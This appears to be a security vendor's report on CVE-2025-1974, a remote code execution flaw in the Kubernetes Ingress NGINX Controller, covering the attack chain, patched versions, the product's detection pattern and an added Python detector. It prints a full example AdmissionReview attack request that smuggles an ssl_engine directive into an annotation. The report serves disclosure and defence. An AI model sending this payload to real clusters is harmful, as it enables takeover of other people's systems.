[2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution
This is an RCE vulnerability in the Ingress NGINX Controller that could allow an attacker to execute malicious commands by sending an AdmissionReview request containing a crafted, temporary NGINX configuration template.
This vulnerability was patched in Ingress NGINX Controller versions 1.12.1 and 1.11.5, and AIWAF responded by adding detection patterns for it in the April 2025 pattern update.
1. Overview
The Ingress NGINX Controller is one of the Ingress Controllers used by Kubernetes. It is responsible for routing incoming traffic from outside the cluster to the relevant Kubernetes services according to configured rules.
This report summarizes our analysis of a recent RCE vulnerability in this Ingress Controller, CVE-2025-1974.
Source: https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
2. Attack Type
CVE-2025-1974 is a remote code execution vulnerability that leverages a structural flaw in the Ingress NGINX Controller. The attacker sends an AdmissionReview request carrying a crafted temporary NGINX configuration template to the controller's Admission Controller, the component that determines whether incoming requests from outside should be authorized, and thereby executes malicious commands.
To carry out the RCE, the attacker first sends a request to the Ingress NGINX Controller Pod whose Content-Length is manipulated to be larger than the actual malicious file size, which tricks the controller into keeping a file descriptor open on the uploaded file in the Pod file system, and then sends an AdmissionReview request to the Admission Controller that accesses that file descriptor.
Source: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
Example attack request:
POST /test/path HTTP/1.1
Content-Length: 1897
Content-Type: application/json
Host: www.test.com
User-Agent: HTTPie

{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "85b707bf-4241-4f9b-9ee8-7809c7132cdc",
    "kind": {
      "group": "networking.k8s.io",
      "version": "v1",
      "kind": "Ingress"
    },
    "resource": {
      "group": "networking.k8s.io",
      "version": "v1",
      "resource": "ingresses"
    },
    "requestKind": {
      "group": "networking.k8s.io",
      "version": "v1",
      "kind": "Ingress"
    },
    "requestResource": {
      "group": "networking.k8s.io",
      "version": "v1",
      "resource": "ingresses"
    },
    "name": "xxx",
    "namespace": "default",
    "operation": "CREATE",
    "userInfo": {
      "username": "kube-review",
      "uid": "60a7a2da-f9ec-4afc-baaa-11bf648233a8"
    },
    "object": {
      "kind": "Ingress",
      "apiVersion": "networking.k8s.io/v1",
      "metadata": {
        "name": "xxx",
        "namespace": "default",
        "creationTimestamp": null,
        "annotations": {
          "nginx.ingress.kubernetes.io/auth-url": "http://example.com/#;}}}\n\nssl_engine /proc/30/fd/10;\n\n"
        }
      },
      "spec": {
        "ingressClassName": "nginx",
        "rules": [
          {
            "host": "xxx.yoshino-s.xyz",
            "http": {
              "paths": [
                {
                  "path": "/",
                  "pathType": "Prefix",
                  "backend": {
                    "service": {
                      "name": "xxx",
                      "port": {
                        "number": 5244
                      }
                    }
                  }
                }
              ]
            }
          }
        ]
      },
      "status": {
        "loadBalancer": {}
      }
    },
    "oldObject": null,
    "dryRun": true,
    "options": {
      "kind": "CreateOptions",
      "apiVersion": "meta.k8s.io/v1"
    }
  }
}
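As an added example (not part of the original report, and not the AIWAF pattern itself), the following Python inspects an AdmissionReview body for ingress-nginx annotation values that carry NGINX configuration metacharacters, the ssl_engine directive, or a procfs file-descriptor path like the one in the request above. The sample bodies are constructed, and the indicator list is a heuristic assumed here, not a complete signature.

```python
import json
import re

# Annotation prefix whose values ingress-nginx renders into the NGINX config.
NGINX_ANNOTATION_PREFIX = "nginx.ingress.kubernetes.io/"

# Indicators (assumed heuristic): characters that let a value break out of the
# directive it is rendered into, the directive abused in CVE-2025-1974, and a procfs fd path.
INDICATORS = [
    ("config-breakout", re.compile(r"[;{}\r\n]")),
    ("ssl_engine-directive", re.compile(r"\bssl_engine\b")),
    ("procfs-fd-path", re.compile(r"/proc/\d+/fd/\d+")),
]

def ingress_annotations(review: dict) -> dict:
    """Return the annotations of the Ingress object inside an AdmissionReview, or {}."""
    obj = (review.get("request") or {}).get("object") or {}
    if obj.get("kind") != "Ingress":
        return {}
    return (obj.get("metadata") or {}).get("annotations") or {}

def scan_admission_review(body: str) -> list[tuple[str, str]]:
    """Return (annotation, indicator) pairs for suspicious ingress-nginx annotation values."""
    try:
        review = json.loads(body)
    except json.JSONDecodeError:
        return [("<body>", "malformed-json")]
    if not isinstance(review, dict) or review.get("kind") != "AdmissionReview":
        return []
    findings = []
    for key, value in ingress_annotations(review).items():
        if not key.startswith(NGINX_ANNOTATION_PREFIX) or not isinstance(value, str):
            continue
        findings.extend((key, label) for label, rx in INDICATORS if rx.search(value))
    return findings

def _review(annotations: dict) -> str:
    """Build a constructed, minimal AdmissionReview body around the given annotations."""
    return json.dumps({"kind": "AdmissionReview", "request": {"object": {
        "kind": "Ingress", "metadata": {"annotations": annotations}}}})

# Constructed samples: the annotation from the report's example request, and a benign control.
MALICIOUS_REVIEW = _review({"nginx.ingress.kubernetes.io/auth-url":
                            "http://example.com/#;}}}\n\nssl_engine /proc/30/fd/10;\n\n"})
BENIGN_REVIEW = _review({"nginx.ingress.kubernetes.io/auth-url": "https://auth.example.com/verify"})

if __name__ == "__main__":
    print("malicious:", scan_admission_review(MALICIOUS_REVIEW))  # three indicators hit
    print("benign:", scan_admission_review(BENIGN_REVIEW))        # []
```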
3. Response
Kubernetes has released patches for CVE-2025-1974 for each supported release line, so users should check their Ingress NGINX Controller version and upgrade to at least the patched release for their line (1.12.1 or 1.11.5).
Our AIWAF product detects this attack via pattern 2256, "Kubernetes ingress-nginx Remote Code Execution", which is part of the April 2025 pattern update.
Source: https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/
4. Conclusion
Kubernetes is an open source container orchestration platform used worldwide and the leading platform for deploying and managing large numbers of containers, so the impact of this vulnerability is high and it is critical to patch to the latest version quickly.
Our AIWAF product has developed response patterns for vulnerabilities in Kubernetes and will continue to respond quickly to related vulnerabilities as they are discovered.